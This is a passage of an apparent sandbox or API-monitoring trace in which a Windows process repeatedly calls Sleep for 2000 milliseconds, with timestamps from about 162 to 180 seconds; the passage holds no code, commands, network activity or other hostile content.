[0162.125] Sleep (dwMilliseconds=0x7d0) [0162.131] Sleep (dwMilliseconds=0x7d0) [0162.147] Sleep (dwMilliseconds=0x7d0) [0162.162] Sleep (dwMilliseconds=0x7d0) [0162.179] Sleep (dwMilliseconds=0x7d0) [0162.194] Sleep (dwMilliseconds=0x7d0) [0162.209] Sleep (dwMilliseconds=0x7d0) [0162.225] Sleep (dwMilliseconds=0x7d0) [0162.240] Sleep (dwMilliseconds=0x7d0) [0162.256] Sleep (dwMilliseconds=0x7d0) [0162.272] Sleep (dwMilliseconds=0x7d0) [0162.291] Sleep (dwMilliseconds=0x7d0) [0162.303] Sleep (dwMilliseconds=0x7d0) [0162.321] Sleep (dwMilliseconds=0x7d0) [0162.334] Sleep (dwMilliseconds=0x7d0) [0162.350] Sleep (dwMilliseconds=0x7d0) [0162.365] Sleep (dwMilliseconds=0x7d0) [0162.381] Sleep (dwMilliseconds=0x7d0) [0162.397] Sleep (dwMilliseconds=0x7d0) [0162.412] Sleep (dwMilliseconds=0x7d0) [0162.427] Sleep (dwMilliseconds=0x7d0) [0162.443] Sleep (dwMilliseconds=0x7d0) [0162.459] Sleep (dwMilliseconds=0x7d0) [0162.474] Sleep (dwMilliseconds=0x7d0) [0162.490] Sleep (dwMilliseconds=0x7d0) [0162.515] Sleep (dwMilliseconds=0x7d0) [0162.521] Sleep (dwMilliseconds=0x7d0) [0162.537] Sleep (dwMilliseconds=0x7d0) [0162.552] Sleep (dwMilliseconds=0x7d0) [0162.568] Sleep (dwMilliseconds=0x7d0) [0162.583] Sleep (dwMilliseconds=0x7d0) [0162.599] Sleep (dwMilliseconds=0x7d0) [0162.616] Sleep (dwMilliseconds=0x7d0) [0162.630] Sleep (dwMilliseconds=0x7d0) [0162.646] Sleep (dwMilliseconds=0x7d0) [0162.661] Sleep (dwMilliseconds=0x7d0) [0162.677] Sleep (dwMilliseconds=0x7d0) [0162.693] Sleep (dwMilliseconds=0x7d0) [0162.708] Sleep (dwMilliseconds=0x7d0) [0162.725] Sleep (dwMilliseconds=0x7d0) [0162.740] Sleep (dwMilliseconds=0x7d0) [0162.755] Sleep (dwMilliseconds=0x7d0) [0162.771] Sleep (dwMilliseconds=0x7d0) [0162.786] Sleep (dwMilliseconds=0x7d0) [0162.802] Sleep (dwMilliseconds=0x7d0) [0162.818] Sleep (dwMilliseconds=0x7d0) [0162.834] Sleep (dwMilliseconds=0x7d0) [0162.849] Sleep (dwMilliseconds=0x7d0) [0162.864] Sleep (dwMilliseconds=0x7d0) [0162.880] Sleep (dwMilliseconds=0x7d0) [0162.895] Sleep (dwMilliseconds=0x7d0) [0162.911] Sleep (dwMilliseconds=0x7d0) [0162.931] Sleep (dwMilliseconds=0x7d0) [0162.943] Sleep (dwMilliseconds=0x7d0) [0162.958] Sleep (dwMilliseconds=0x7d0) [0162.973] Sleep (dwMilliseconds=0x7d0) [0162.989] Sleep (dwMilliseconds=0x7d0) [0163.005] Sleep (dwMilliseconds=0x7d0) [0163.020] Sleep (dwMilliseconds=0x7d0) [0163.036] Sleep (dwMilliseconds=0x7d0) [0163.053] Sleep (dwMilliseconds=0x7d0) [0163.067] Sleep (dwMilliseconds=0x7d0) [0163.083] Sleep (dwMilliseconds=0x7d0) [0163.098] Sleep (dwMilliseconds=0x7d0) [0163.146] Sleep (dwMilliseconds=0x7d0) [0163.163] Sleep (dwMilliseconds=0x7d0) [0163.176] Sleep (dwMilliseconds=0x7d0) [0163.192] Sleep (dwMilliseconds=0x7d0) [0163.208] Sleep (dwMilliseconds=0x7d0) [0163.223] Sleep (dwMilliseconds=0x7d0) [0163.239] Sleep (dwMilliseconds=0x7d0) [0163.254] Sleep (dwMilliseconds=0x7d0) [0163.277] Sleep (dwMilliseconds=0x7d0) [0163.293] Sleep (dwMilliseconds=0x7d0) [0163.308] Sleep (dwMilliseconds=0x7d0) [0163.320] Sleep (dwMilliseconds=0x7d0) [0163.338] Sleep (dwMilliseconds=0x7d0) [0163.351] Sleep (dwMilliseconds=0x7d0) [0163.367] Sleep (dwMilliseconds=0x7d0) [0163.384] Sleep (dwMilliseconds=0x7d0) [0163.398] Sleep (dwMilliseconds=0x7d0) [0163.414] Sleep (dwMilliseconds=0x7d0) [0163.441] Sleep (dwMilliseconds=0x7d0) [0163.445] Sleep (dwMilliseconds=0x7d0) [0163.462] Sleep (dwMilliseconds=0x7d0) [0163.477] Sleep (dwMilliseconds=0x7d0) [0163.493] Sleep (dwMilliseconds=0x7d0) [0163.508] Sleep (dwMilliseconds=0x7d0) [0163.525] Sleep (dwMilliseconds=0x7d0) [0163.539] Sleep (dwMilliseconds=0x7d0) [0163.555] Sleep (dwMilliseconds=0x7d0) [0163.570] Sleep (dwMilliseconds=0x7d0) [0163.586] Sleep (dwMilliseconds=0x7d0) [0163.603] Sleep (dwMilliseconds=0x7d0) [0163.617] Sleep (dwMilliseconds=0x7d0) [0163.633] Sleep (dwMilliseconds=0x7d0) [0163.648] Sleep (dwMilliseconds=0x7d0) [0163.664] Sleep (dwMilliseconds=0x7d0) [0163.681] Sleep (dwMilliseconds=0x7d0) [0163.695] Sleep (dwMilliseconds=0x7d0) [0163.712] Sleep (dwMilliseconds=0x7d0) [0163.727] Sleep (dwMilliseconds=0x7d0) [0163.741] Sleep (dwMilliseconds=0x7d0) [0163.759] Sleep (dwMilliseconds=0x7d0) [0163.772] Sleep (dwMilliseconds=0x7d0) [0163.793] Sleep (dwMilliseconds=0x7d0) [0163.804] Sleep (dwMilliseconds=0x7d0) [0163.824] Sleep (dwMilliseconds=0x7d0) [0163.834] Sleep (dwMilliseconds=0x7d0) [0163.851] Sleep (dwMilliseconds=0x7d0) [0163.870] Sleep (dwMilliseconds=0x7d0) [0163.882] Sleep (dwMilliseconds=0x7d0) [0163.897] Sleep (dwMilliseconds=0x7d0) [0163.921] Sleep (dwMilliseconds=0x7d0) [0163.928] Sleep (dwMilliseconds=0x7d0) [0163.945] Sleep (dwMilliseconds=0x7d0) [0163.961] Sleep (dwMilliseconds=0x7d0) [0163.977] Sleep (dwMilliseconds=0x7d0) [0163.992] Sleep (dwMilliseconds=0x7d0) [0164.007] Sleep (dwMilliseconds=0x7d0) [0164.024] Sleep (dwMilliseconds=0x7d0) [0164.038] Sleep (dwMilliseconds=0x7d0) [0164.053] Sleep (dwMilliseconds=0x7d0) [0164.075] Sleep (dwMilliseconds=0x7d0) [0164.086] Sleep (dwMilliseconds=0x7d0) [0164.101] Sleep (dwMilliseconds=0x7d0) [0164.135] Sleep (dwMilliseconds=0x7d0) [0164.144] Sleep (dwMilliseconds=0x7d0) [0164.159] Sleep (dwMilliseconds=0x7d0) [0164.175] Sleep (dwMilliseconds=0x7d0) [0164.190] Sleep (dwMilliseconds=0x7d0) [0164.206] Sleep (dwMilliseconds=0x7d0) [0164.221] Sleep (dwMilliseconds=0x7d0) [0164.238] Sleep (dwMilliseconds=0x7d0) [0164.253] Sleep (dwMilliseconds=0x7d0) [0164.268] Sleep (dwMilliseconds=0x7d0) [0164.284] Sleep (dwMilliseconds=0x7d0) [0164.300] Sleep (dwMilliseconds=0x7d0) [0164.317] Sleep (dwMilliseconds=0x7d0) [0164.331] Sleep (dwMilliseconds=0x7d0) [0164.474] Sleep (dwMilliseconds=0x7d0) [0164.566] Sleep (dwMilliseconds=0x7d0) [0164.611] Sleep (dwMilliseconds=0x7d0) [0164.658] Sleep (dwMilliseconds=0x7d0) [0164.705] Sleep (dwMilliseconds=0x7d0) [0164.752] Sleep (dwMilliseconds=0x7d0) [0164.799] Sleep (dwMilliseconds=0x7d0) [0164.846] Sleep (dwMilliseconds=0x7d0) [0164.892] Sleep (dwMilliseconds=0x7d0) [0164.939] Sleep (dwMilliseconds=0x7d0) [0164.986] Sleep (dwMilliseconds=0x7d0) [0165.034] Sleep (dwMilliseconds=0x7d0) [0165.080] Sleep (dwMilliseconds=0x7d0) [0165.126] Sleep (dwMilliseconds=0x7d0) [0165.173] Sleep (dwMilliseconds=0x7d0) [0165.235] Sleep (dwMilliseconds=0x7d0) [0165.283] Sleep (dwMilliseconds=0x7d0) [0165.329] Sleep (dwMilliseconds=0x7d0) [0165.376] Sleep (dwMilliseconds=0x7d0) [0165.423] Sleep (dwMilliseconds=0x7d0) [0165.469] Sleep (dwMilliseconds=0x7d0) [0165.519] Sleep (dwMilliseconds=0x7d0) [0165.563] Sleep (dwMilliseconds=0x7d0) [0165.610] Sleep (dwMilliseconds=0x7d0) [0165.658] Sleep (dwMilliseconds=0x7d0) [0165.703] Sleep (dwMilliseconds=0x7d0) [0165.750] Sleep (dwMilliseconds=0x7d0) [0165.773] Sleep (dwMilliseconds=0x7d0) [0165.781] Sleep (dwMilliseconds=0x7d0) [0165.797] Sleep (dwMilliseconds=0x7d0) [0165.813] Sleep (dwMilliseconds=0x7d0) [0165.828] Sleep (dwMilliseconds=0x7d0) [0165.844] Sleep (dwMilliseconds=0x7d0) [0165.859] Sleep (dwMilliseconds=0x7d0) [0165.876] Sleep (dwMilliseconds=0x7d0) [0165.891] Sleep (dwMilliseconds=0x7d0) [0165.906] Sleep (dwMilliseconds=0x7d0) [0165.922] Sleep (dwMilliseconds=0x7d0) [0165.938] Sleep (dwMilliseconds=0x7d0) [0165.953] Sleep (dwMilliseconds=0x7d0) [0165.969] Sleep (dwMilliseconds=0x7d0) [0165.986] Sleep (dwMilliseconds=0x7d0) [0166.000] Sleep (dwMilliseconds=0x7d0) [0166.015] Sleep (dwMilliseconds=0x7d0) [0166.031] Sleep (dwMilliseconds=0x7d0) [0166.047] Sleep (dwMilliseconds=0x7d0) [0166.071] Sleep (dwMilliseconds=0x7d0) [0166.079] Sleep (dwMilliseconds=0x7d0) [0166.097] Sleep (dwMilliseconds=0x7d0) [0166.109] Sleep (dwMilliseconds=0x7d0) [0166.125] Sleep (dwMilliseconds=0x7d0) [0166.140] Sleep (dwMilliseconds=0x7d0) [0166.156] Sleep (dwMilliseconds=0x7d0) [0166.171] Sleep (dwMilliseconds=0x7d0) [0166.207] Sleep (dwMilliseconds=0x7d0) [0166.222] Sleep (dwMilliseconds=0x7d0) [0166.239] Sleep (dwMilliseconds=0x7d0) [0166.253] Sleep (dwMilliseconds=0x7d0) [0166.270] Sleep (dwMilliseconds=0x7d0) [0166.285] Sleep (dwMilliseconds=0x7d0) [0166.303] Sleep (dwMilliseconds=0x7d0) [0166.316] Sleep (dwMilliseconds=0x7d0) [0166.332] Sleep (dwMilliseconds=0x7d0) [0166.348] Sleep (dwMilliseconds=0x7d0) [0166.363] Sleep (dwMilliseconds=0x7d0) [0166.380] Sleep (dwMilliseconds=0x7d0) [0166.411] Sleep (dwMilliseconds=0x7d0) [0166.443] Sleep (dwMilliseconds=0x7d0) [0166.484] Sleep (dwMilliseconds=0x7d0) [0166.532] Sleep (dwMilliseconds=0x7d0) [0166.578] Sleep (dwMilliseconds=0x7d0) [0166.639] Sleep (dwMilliseconds=0x7d0) [0166.686] Sleep (dwMilliseconds=0x7d0) [0166.733] Sleep (dwMilliseconds=0x7d0) [0166.781] Sleep (dwMilliseconds=0x7d0) [0166.827] Sleep (dwMilliseconds=0x7d0) [0166.967] Sleep (dwMilliseconds=0x7d0) [0167.061] Sleep (dwMilliseconds=0x7d0) [0167.124] Sleep (dwMilliseconds=0x7d0) [0167.183] Sleep (dwMilliseconds=0x7d0) [0167.239] Sleep (dwMilliseconds=0x7d0) [0168.102] Sleep (dwMilliseconds=0x7d0) [0168.143] Sleep (dwMilliseconds=0x7d0) [0168.193] Sleep (dwMilliseconds=0x7d0) [0168.231] Sleep (dwMilliseconds=0x7d0) [0168.278] Sleep (dwMilliseconds=0x7d0) [0168.327] Sleep (dwMilliseconds=0x7d0) [0168.372] Sleep (dwMilliseconds=0x7d0) [0168.418] Sleep (dwMilliseconds=0x7d0) [0168.467] Sleep (dwMilliseconds=0x7d0) [0168.513] Sleep (dwMilliseconds=0x7d0) [0168.559] Sleep (dwMilliseconds=0x7d0) [0168.605] Sleep (dwMilliseconds=0x7d0) [0168.652] Sleep (dwMilliseconds=0x7d0) [0168.699] Sleep (dwMilliseconds=0x7d0) [0168.745] Sleep (dwMilliseconds=0x7d0) [0168.793] Sleep (dwMilliseconds=0x7d0) [0168.857] Sleep (dwMilliseconds=0x7d0) [0168.902] Sleep (dwMilliseconds=0x7d0) [0168.950] Sleep (dwMilliseconds=0x7d0) [0169.012] Sleep (dwMilliseconds=0x7d0) [0169.060] Sleep (dwMilliseconds=0x7d0) [0169.109] Sleep (dwMilliseconds=0x7d0) [0169.155] Sleep (dwMilliseconds=0x7d0) [0169.200] Sleep (dwMilliseconds=0x7d0) [0169.255] Sleep (dwMilliseconds=0x7d0) [0169.635] Sleep (dwMilliseconds=0x7d0) [0169.759] Sleep (dwMilliseconds=0x7d0) [0170.354] Sleep (dwMilliseconds=0x7d0) [0171.830] Sleep (dwMilliseconds=0x7d0) [0171.905] Sleep (dwMilliseconds=0x7d0) [0172.378] Sleep (dwMilliseconds=0x7d0) [0172.412] Sleep (dwMilliseconds=0x7d0) [0173.470] Sleep (dwMilliseconds=0x7d0) [0173.717] Sleep (dwMilliseconds=0x7d0) [0173.759] Sleep (dwMilliseconds=0x7d0) [0173.794] Sleep (dwMilliseconds=0x7d0) [0174.140] Sleep (dwMilliseconds=0x7d0) [0174.281] Sleep (dwMilliseconds=0x7d0) [0174.316] Sleep (dwMilliseconds=0x7d0) [0174.366] Sleep (dwMilliseconds=0x7d0) [0174.420] Sleep (dwMilliseconds=0x7d0) [0174.467] Sleep (dwMilliseconds=0x7d0) [0174.503] Sleep (dwMilliseconds=0x7d0) [0174.561] Sleep (dwMilliseconds=0x7d0) [0174.610] Sleep (dwMilliseconds=0x7d0) [0174.640] Sleep (dwMilliseconds=0x7d0) [0174.801] Sleep (dwMilliseconds=0x7d0) [0174.836] Sleep (dwMilliseconds=0x7d0) [0175.076] Sleep (dwMilliseconds=0x7d0) [0175.090] Sleep (dwMilliseconds=0x7d0) [0175.096] Sleep (dwMilliseconds=0x7d0) [0175.111] Sleep (dwMilliseconds=0x7d0) [0175.126] Sleep (dwMilliseconds=0x7d0) [0175.143] Sleep (dwMilliseconds=0x7d0) [0175.157] Sleep (dwMilliseconds=0x7d0) [0175.173] Sleep (dwMilliseconds=0x7d0) [0175.221] Sleep (dwMilliseconds=0x7d0) [0175.239] Sleep (dwMilliseconds=0x7d0) [0175.251] Sleep (dwMilliseconds=0x7d0) [0175.267] Sleep (dwMilliseconds=0x7d0) [0175.283] Sleep (dwMilliseconds=0x7d0) [0175.299] Sleep (dwMilliseconds=0x7d0) [0175.313] Sleep (dwMilliseconds=0x7d0) [0175.329] Sleep (dwMilliseconds=0x7d0) [0175.405] Sleep (dwMilliseconds=0x7d0) [0175.414] Sleep (dwMilliseconds=0x7d0) [0175.428] Sleep (dwMilliseconds=0x7d0) [0175.444] Sleep (dwMilliseconds=0x7d0) [0175.459] Sleep (dwMilliseconds=0x7d0) [0175.478] Sleep (dwMilliseconds=0x7d0) [0175.490] Sleep (dwMilliseconds=0x7d0) [0175.506] Sleep (dwMilliseconds=0x7d0) [0175.522] Sleep (dwMilliseconds=0x7d0) [0175.537] Sleep (dwMilliseconds=0x7d0) [0175.552] Sleep (dwMilliseconds=0x7d0) [0175.570] Sleep (dwMilliseconds=0x7d0) [0175.584] Sleep (dwMilliseconds=0x7d0) [0175.598] Sleep (dwMilliseconds=0x7d0) [0175.614] Sleep (dwMilliseconds=0x7d0) [0175.630] Sleep (dwMilliseconds=0x7d0) [0175.648] Sleep (dwMilliseconds=0x7d0) [0175.665] Sleep (dwMilliseconds=0x7d0) [0175.678] Sleep (dwMilliseconds=0x7d0) [0175.692] Sleep (dwMilliseconds=0x7d0) [0175.708] Sleep (dwMilliseconds=0x7d0) [0175.724] Sleep (dwMilliseconds=0x7d0) [0175.739] Sleep (dwMilliseconds=0x7d0) [0175.758] Sleep (dwMilliseconds=0x7d0) [0175.771] Sleep (dwMilliseconds=0x7d0) [0175.787] Sleep (dwMilliseconds=0x7d0) [0175.802] Sleep (dwMilliseconds=0x7d0) [0175.818] Sleep (dwMilliseconds=0x7d0) [0175.837] Sleep (dwMilliseconds=0x7d0) [0175.897] Sleep (dwMilliseconds=0x7d0) [0175.913] Sleep (dwMilliseconds=0x7d0) [0175.936] Sleep (dwMilliseconds=0x7d0) [0175.944] Sleep (dwMilliseconds=0x7d0) [0175.957] Sleep (dwMilliseconds=0x7d0) [0175.976] Sleep (dwMilliseconds=0x7d0) [0175.990] Sleep (dwMilliseconds=0x7d0) [0176.009] Sleep (dwMilliseconds=0x7d0) [0176.021] Sleep (dwMilliseconds=0x7d0) [0176.042] Sleep (dwMilliseconds=0x7d0) [0176.052] Sleep (dwMilliseconds=0x7d0) [0176.067] Sleep (dwMilliseconds=0x7d0) [0176.085] Sleep (dwMilliseconds=0x7d0) [0176.129] Sleep (dwMilliseconds=0x7d0) [0176.169] Sleep (dwMilliseconds=0x7d0) [0176.206] Sleep (dwMilliseconds=0x7d0) [0176.225] Sleep (dwMilliseconds=0x7d0) [0176.248] Sleep (dwMilliseconds=0x7d0) [0176.267] Sleep (dwMilliseconds=0x7d0) [0176.286] Sleep (dwMilliseconds=0x7d0) [0176.305] Sleep (dwMilliseconds=0x7d0) [0176.316] Sleep (dwMilliseconds=0x7d0) [0176.333] Sleep (dwMilliseconds=0x7d0) [0176.348] Sleep (dwMilliseconds=0x7d0) [0176.364] Sleep (dwMilliseconds=0x7d0) [0176.380] Sleep (dwMilliseconds=0x7d0) [0176.396] Sleep (dwMilliseconds=0x7d0) [0176.413] Sleep (dwMilliseconds=0x7d0) [0176.434] Sleep (dwMilliseconds=0x7d0) [0176.462] Sleep (dwMilliseconds=0x7d0) [0176.474] Sleep (dwMilliseconds=0x7d0) [0176.515] Sleep (dwMilliseconds=0x7d0) [0176.537] Sleep (dwMilliseconds=0x7d0) [0176.551] Sleep (dwMilliseconds=0x7d0) [0176.594] Sleep (dwMilliseconds=0x7d0) [0176.613] Sleep (dwMilliseconds=0x7d0) [0176.630] Sleep (dwMilliseconds=0x7d0) [0176.648] Sleep (dwMilliseconds=0x7d0) [0176.663] Sleep (dwMilliseconds=0x7d0) [0176.679] Sleep (dwMilliseconds=0x7d0) [0176.692] Sleep (dwMilliseconds=0x7d0) [0176.710] Sleep (dwMilliseconds=0x7d0) [0176.722] Sleep (dwMilliseconds=0x7d0) [0176.737] Sleep (dwMilliseconds=0x7d0) [0176.756] Sleep (dwMilliseconds=0x7d0) [0176.770] Sleep (dwMilliseconds=0x7d0) [0176.786] Sleep (dwMilliseconds=0x7d0) [0176.817] Sleep (dwMilliseconds=0x7d0) [0176.864] Sleep (dwMilliseconds=0x7d0) [0176.897] Sleep (dwMilliseconds=0x7d0) [0176.915] Sleep (dwMilliseconds=0x7d0) [0176.924] Sleep (dwMilliseconds=0x7d0) [0176.945] Sleep (dwMilliseconds=0x7d0) [0176.957] Sleep (dwMilliseconds=0x7d0) [0176.979] Sleep (dwMilliseconds=0x7d0) [0176.999] Sleep (dwMilliseconds=0x7d0) [0177.047] Sleep (dwMilliseconds=0x7d0) [0177.062] Sleep (dwMilliseconds=0x7d0) [0177.079] Sleep (dwMilliseconds=0x7d0) [0177.162] Sleep (dwMilliseconds=0x7d0) [0177.172] Sleep (dwMilliseconds=0x7d0) [0177.203] Sleep (dwMilliseconds=0x7d0) [0177.216] Sleep (dwMilliseconds=0x7d0) [0177.232] Sleep (dwMilliseconds=0x7d0) [0177.247] Sleep (dwMilliseconds=0x7d0) [0177.263] Sleep (dwMilliseconds=0x7d0) [0177.280] Sleep (dwMilliseconds=0x7d0) [0177.294] Sleep (dwMilliseconds=0x7d0) [0177.310] Sleep (dwMilliseconds=0x7d0) [0177.325] Sleep (dwMilliseconds=0x7d0) [0177.368] Sleep (dwMilliseconds=0x7d0) [0177.373] Sleep (dwMilliseconds=0x7d0) [0177.394] Sleep (dwMilliseconds=0x7d0) [0177.408] Sleep (dwMilliseconds=0x7d0) [0177.425] Sleep (dwMilliseconds=0x7d0) [0177.440] Sleep (dwMilliseconds=0x7d0) [0177.455] Sleep (dwMilliseconds=0x7d0) [0177.470] Sleep (dwMilliseconds=0x7d0) [0177.486] Sleep (dwMilliseconds=0x7d0) [0177.503] Sleep (dwMilliseconds=0x7d0) [0177.531] Sleep (dwMilliseconds=0x7d0) [0177.554] Sleep (dwMilliseconds=0x7d0) [0177.564] Sleep (dwMilliseconds=0x7d0) [0177.580] Sleep (dwMilliseconds=0x7d0) [0177.596] Sleep (dwMilliseconds=0x7d0) [0177.617] Sleep (dwMilliseconds=0x7d0) [0177.630] Sleep (dwMilliseconds=0x7d0) [0177.643] Sleep (dwMilliseconds=0x7d0) [0177.658] Sleep (dwMilliseconds=0x7d0) [0177.681] Sleep (dwMilliseconds=0x7d0) [0177.691] Sleep (dwMilliseconds=0x7d0) [0177.705] Sleep (dwMilliseconds=0x7d0) [0177.720] Sleep (dwMilliseconds=0x7d0) [0177.736] Sleep (dwMilliseconds=0x7d0) [0177.751] Sleep (dwMilliseconds=0x7d0) [0177.767] Sleep (dwMilliseconds=0x7d0) [0177.783] Sleep (dwMilliseconds=0x7d0) [0177.800] Sleep (dwMilliseconds=0x7d0) [0177.819] Sleep (dwMilliseconds=0x7d0) [0177.831] Sleep (dwMilliseconds=0x7d0) [0177.845] Sleep (dwMilliseconds=0x7d0) [0177.861] Sleep (dwMilliseconds=0x7d0) [0177.877] Sleep (dwMilliseconds=0x7d0) [0177.892] Sleep (dwMilliseconds=0x7d0) [0177.908] Sleep (dwMilliseconds=0x7d0) [0177.926] Sleep (dwMilliseconds=0x7d0) [0177.940] Sleep (dwMilliseconds=0x7d0) [0177.955] Sleep (dwMilliseconds=0x7d0) [0177.970] Sleep (dwMilliseconds=0x7d0) [0177.986] Sleep (dwMilliseconds=0x7d0) [0178.001] Sleep (dwMilliseconds=0x7d0) [0178.017] Sleep (dwMilliseconds=0x7d0) [0178.033] Sleep (dwMilliseconds=0x7d0) [0178.048] Sleep (dwMilliseconds=0x7d0) [0178.066] Sleep (dwMilliseconds=0x7d0) [0178.082] Sleep (dwMilliseconds=0x7d0) [0178.095] Sleep (dwMilliseconds=0x7d0) [0178.110] Sleep (dwMilliseconds=0x7d0) [0178.125] Sleep (dwMilliseconds=0x7d0) [0178.142] Sleep (dwMilliseconds=0x7d0) [0178.160] Sleep (dwMilliseconds=0x7d0) [0178.173] Sleep (dwMilliseconds=0x7d0) [0178.190] Sleep (dwMilliseconds=0x7d0) [0178.241] Sleep (dwMilliseconds=0x7d0) [0178.252] Sleep (dwMilliseconds=0x7d0) [0178.268] Sleep (dwMilliseconds=0x7d0) [0178.282] Sleep (dwMilliseconds=0x7d0) [0178.300] Sleep (dwMilliseconds=0x7d0) [0178.313] Sleep (dwMilliseconds=0x7d0) [0178.329] Sleep (dwMilliseconds=0x7d0) [0178.345] Sleep (dwMilliseconds=0x7d0) [0178.360] Sleep (dwMilliseconds=0x7d0) [0178.390] Sleep (dwMilliseconds=0x7d0) [0178.411] Sleep (dwMilliseconds=0x7d0) [0178.436] Sleep (dwMilliseconds=0x7d0) [0178.454] Sleep (dwMilliseconds=0x7d0) [0178.469] Sleep (dwMilliseconds=0x7d0) [0178.488] Sleep (dwMilliseconds=0x7d0) [0178.501] Sleep (dwMilliseconds=0x7d0) [0178.528] Sleep (dwMilliseconds=0x7d0) [0178.547] Sleep (dwMilliseconds=0x7d0) [0178.578] Sleep (dwMilliseconds=0x7d0) [0178.594] Sleep (dwMilliseconds=0x7d0) [0178.612] Sleep (dwMilliseconds=0x7d0) [0178.625] Sleep (dwMilliseconds=0x7d0) [0178.640] Sleep (dwMilliseconds=0x7d0) [0178.656] Sleep (dwMilliseconds=0x7d0) [0178.673] Sleep (dwMilliseconds=0x7d0) [0178.687] Sleep (dwMilliseconds=0x7d0) [0178.703] Sleep (dwMilliseconds=0x7d0) [0178.737] Sleep (dwMilliseconds=0x7d0) [0178.752] Sleep (dwMilliseconds=0x7d0) [0178.765] Sleep (dwMilliseconds=0x7d0) [0178.781] Sleep (dwMilliseconds=0x7d0) [0178.797] Sleep (dwMilliseconds=0x7d0) [0178.815] Sleep (dwMilliseconds=0x7d0) [0178.827] Sleep (dwMilliseconds=0x7d0) [0178.842] Sleep (dwMilliseconds=0x7d0) [0178.859] Sleep (dwMilliseconds=0x7d0) [0178.874] Sleep (dwMilliseconds=0x7d0) [0178.891] Sleep (dwMilliseconds=0x7d0) [0178.905] Sleep (dwMilliseconds=0x7d0) [0178.921] Sleep (dwMilliseconds=0x7d0) [0178.936] Sleep (dwMilliseconds=0x7d0) [0178.953] Sleep (dwMilliseconds=0x7d0) [0178.968] Sleep (dwMilliseconds=0x7d0) [0178.984] Sleep (dwMilliseconds=0x7d0) [0179.000] Sleep (dwMilliseconds=0x7d0) [0179.021] Sleep (dwMilliseconds=0x7d0) [0179.031] Sleep (dwMilliseconds=0x7d0) [0179.046] Sleep (dwMilliseconds=0x7d0) [0179.061] Sleep (dwMilliseconds=0x7d0) [0179.076] Sleep (dwMilliseconds=0x7d0) [0179.092] Sleep (dwMilliseconds=0x7d0) [0179.110] Sleep (dwMilliseconds=0x7d0) [0179.124] Sleep (dwMilliseconds=0x7d0) [0179.139] Sleep (dwMilliseconds=0x7d0) [0179.155] Sleep (dwMilliseconds=0x7d0) [0179.171] Sleep (dwMilliseconds=0x7d0) [0179.186] Sleep (dwMilliseconds=0x7d0) [0179.205] Sleep (dwMilliseconds=0x7d0) [0179.230] Sleep (dwMilliseconds=0x7d0) [0179.249] Sleep (dwMilliseconds=0x7d0) [0179.264] Sleep (dwMilliseconds=0x7d0) [0179.280] Sleep (dwMilliseconds=0x7d0) [0179.295] Sleep (dwMilliseconds=0x7d0) [0179.312] Sleep (dwMilliseconds=0x7d0) [0179.327] Sleep (dwMilliseconds=0x7d0) [0179.343] Sleep (dwMilliseconds=0x7d0) [0179.358] Sleep (dwMilliseconds=0x7d0) [0179.374] Sleep (dwMilliseconds=0x7d0) [0179.390] Sleep (dwMilliseconds=0x7d0) [0179.405] Sleep (dwMilliseconds=0x7d0) [0179.420] Sleep (dwMilliseconds=0x7d0) [0179.437] Sleep (dwMilliseconds=0x7d0) [0179.452] Sleep (dwMilliseconds=0x7d0) [0179.467] Sleep (dwMilliseconds=0x7d0) [0179.483] Sleep (dwMilliseconds=0x7d0) [0179.498] Sleep (dwMilliseconds=0x7d0) [0179.514] Sleep (dwMilliseconds=0x7d0) [0179.532] Sleep (dwMilliseconds=0x7d0) [0179.545] Sleep (dwMilliseconds=0x7d0) [0179.561] Sleep (dwMilliseconds=0x7d0) [0179.581] Sleep (dwMilliseconds=0x7d0) [0179.592] Sleep (dwMilliseconds=0x7d0) [0179.609] Sleep (dwMilliseconds=0x7d0) [0179.623] Sleep (dwMilliseconds=0x7d0) [0179.640] Sleep (dwMilliseconds=0x7d0) [0179.654] Sleep (dwMilliseconds=0x7d0) [0179.672] Sleep (dwMilliseconds=0x7d0) [0179.686] Sleep (dwMilliseconds=0x7d0) [0179.702] Sleep (dwMilliseconds=0x7d0) [0179.718] Sleep (dwMilliseconds=0x7d0) [0179.733] Sleep (dwMilliseconds=0x7d0) [0179.750] Sleep (dwMilliseconds=0x7d0) [0179.764] Sleep (dwMilliseconds=0x7d0) [0179.779] Sleep (dwMilliseconds=0x7d0) [0179.794] Sleep (dwMilliseconds=0x7d0) [0179.810] Sleep (dwMilliseconds=0x7d0) [0179.830] Sleep (dwMilliseconds=0x7d0) [0179.842] Sleep (dwMilliseconds=0x7d0) [0179.857] Sleep (dwMilliseconds=0x7d0) [0179.874] Sleep (dwMilliseconds=0x7d0) [0179.890] Sleep (dwMilliseconds=0x7d0) [0179.906] Sleep (dwMilliseconds=0x7d0) [0179.919] Sleep (dwMilliseconds=0x7d0) [0179.936] Sleep (dwMilliseconds=0x7d0) [0179.950] Sleep (dwMilliseconds=0x7d0) [0179.970] Sleep (dwMilliseconds=0x7d0) [0179.982] Sleep (dwMilliseconds=0x7d0) [0179.999] Sleep (dwMilliseconds=0x7d0) [0180.014] Sleep (dwMilliseconds=0x7d0) [0180.028] Sleep (dwMilliseconds=0x7d0) [0180.045] Sleep (dwMilliseconds=0x7d0) [0180.064] Sleep (dwMilliseconds=0x7d0) [0180.076] Sleep (dwMilliseconds=0x7d0) [0180.093] Sleep (dwMilliseconds=0x7d0) [0180.107] Sleep (dwMilliseconds=0x7d0) [0180.122] Sleep (dwMilliseconds=0x7d0) [0180.140] Sleep (dwMilliseconds=0x7d0) [0180.153] Sleep (dwMilliseconds=0x7d0) [0180.170] Sleep (dwMilliseconds=0x7d0) [0180.186] Sleep (dwMilliseconds=0x7d0) [0180.201] Sleep (dwMilliseconds=0x7d0) [0180.229] Sleep (dwMilliseconds=0x7d0) [0180.248] Sleep (dwMilliseconds=0x7d0) [0180.268] Sleep (dwMilliseconds=0x7d0) [0180.280] Sleep (dwMilliseconds=0x7d0) [0180.297] Sleep (dwMilliseconds=0x7d0) [0180.310] Sleep (dwMilliseconds=0x7d0) [0180.326] Sleep (dwMilliseconds=0x7d0) [0180.342] Sleep (dwMilliseconds=0x7d0) [0180.357] Sleep (dwMilliseconds=0x7d0) [0180.373] Sleep (dwMilliseconds=0x7d0) [0180.389] Sleep (dwMilliseconds=0x7d0) [0180.404] Sleep (dwMilliseconds=0x7d0) [0180.419] Sleep (dwMilliseconds=0x7d0) [0180.435] Sleep (dwMilliseconds=0x7d0) [0180.451] Sleep (dwMilliseconds=0x7d0) [0180.466] Sleep (dwMilliseconds=0x7d0) [0180.484] Sleep (dwMilliseconds=0x7d0) [0180.497] Sleep (dwMilliseconds=0x7d0) [0180.513] Sleep 